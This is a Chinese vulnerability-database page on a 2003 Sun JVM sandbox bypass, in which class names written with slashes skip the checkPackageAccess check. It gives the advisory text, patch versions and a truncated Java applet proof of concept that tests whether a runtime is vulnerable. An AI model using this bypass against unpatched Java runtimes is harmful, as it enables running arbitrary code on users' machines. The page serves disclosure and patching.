发布时间 :2003-11-17 00:00:00
修订时间 :2016-10-17 22:38:12

[原文]The loadClass method of the sun.applet.AppletClassLoader class in the Java Virtual Machine (JVM) in Sun SDK and JRE 1.4.1_03 and earlier allows remote attackers to bypass sandbox restrictions and execute arbitrary code via a loaded class name that contains "/" (slash) instead of "." (dot) characters, which bypasses a call to the Security Manager's checkPackageAccess method.

[CNNVD]Sun Java Virtual Machine Slash Path Security Model Circumvention漏洞(CNNVD-200311-075)

        在Sun SDK和JRE 1.4.1_03以及之前版本中Java虚拟机(JVM)的sun.applet.AppletClassLoader类中loadClass类函数存在漏洞。远程攻击者借助含有“/”(斜线)而不是"." (点)字符的加载类名绕过沙箱的限制并执行任意代码,该漏洞绕过安全管理checkPackageAccess

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20021023 [LSD] Security vulnerability in SUN's Java Virtual Machine implementation
(UNKNOWN)  BUGTRAQ  20031027 Re: [LSD] Security vulnerability in SUN's Java Virtual Machine implementation
(UNKNOWN)  BUGTRAQ  20031027 Re: [LSD] Security vulnerability in SUN's Java Virtual Machineimplementation
(UNKNOWN)  BID  8879

- 漏洞信息

Sun Java Virtual Machine Slash Path Security Model Circumvention漏洞
高危 设计错误
2003-11-17 00:00:00 2010-04-26 00:00:00
        在Sun SDK和JRE 1.4.1_03以及之前版本中Java虚拟机(JVM)的sun.applet.AppletClassLoader类中loadClass类函数存在漏洞。远程攻击者借助含有“/”(斜线)而不是"." (点)字符的加载类名绕过沙箱的限制并执行任意代码,该漏洞绕过安全管理checkPackageAccess

- 公告与补丁

        HP has released an advisory (HPSBUX0311-295) to address this issue. HP suggests the following manual updates:
        Java or later (T1456AA (JDK 1.4), T1457AA (JRE 1.4))
        Java or later (B9788AA (JDK 1.3), B9789AA (JRE 1,3))
        Java or later (B8110AA (JDK 1.2), B8111AA (JRE 1.2))
        These updates may be obtained from HP revised their advisory to include details about HP-UX 11.04 (VVOS). This issue affects HP-UX 11.04 (VVOS) with Virtualvault A.04.50 or Virtualvault A.04.60 or Virtualvault A.04.70 installed. These platforms are only affected if Java has been downloaded and integrated on Virtualvault. Further details may be found in the advisory.
        This issue is addressed in the following SDK and JRE versions of Windows Production Releases, Solaris OE Production Releases and Linux Production Releases:
        SDK and JRE 1.4.1_04 and later
        SDK and JRE 1.3.1_09 and later
        SDK and JRE 1.2.2_016 and later
        Solaris Operating Environment (OE) Reference Releases SDK and JRE 1.2.2_016 and later also include fixes.
        Fixes are available at the following location:
        See referenced advisory for additional details.
        HP has released an update the their original advisory stating that more HP-UX versions are affected that were originally reported. Please see the referenced advisory for more information.

- 漏洞信息 (23276)

Sun Java Virtual Machine 1.x Slash Path Security Model Circumvention Vulnerability (EDBID:23276)
multiple dos
2003-10-22 Verified
0 Last Stage of Delirium
N/A [点击下载]

A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts. 

import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;

public class Simple extends Applet {

StringBuffer buffer;

public void init() {
buffer = new StringBuffer();

public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla =
cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not


- 漏洞信息

Java Virtual Machine sun.applet.AppletClassLoader loadClass Method Arbitrary Code Execution
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

The Sun Java Virtual Machine, present in their JDK & SDK products, contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a package is loaded into the JVM using a "/" instead of a "." for the package name separator. This causes the package access checks to be bypassed, allowing users to use packages for which they have no access. This flaw may lead to a loss of confidentiality and/or integrity.

- 时间线

2003-10-21 Unknow
2003-10-21 Unknow

- 解决方案

Upgrade to version 1.4.1_04, 1.3.1_09, or 1.2.2_16 or higher, as these versions have been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者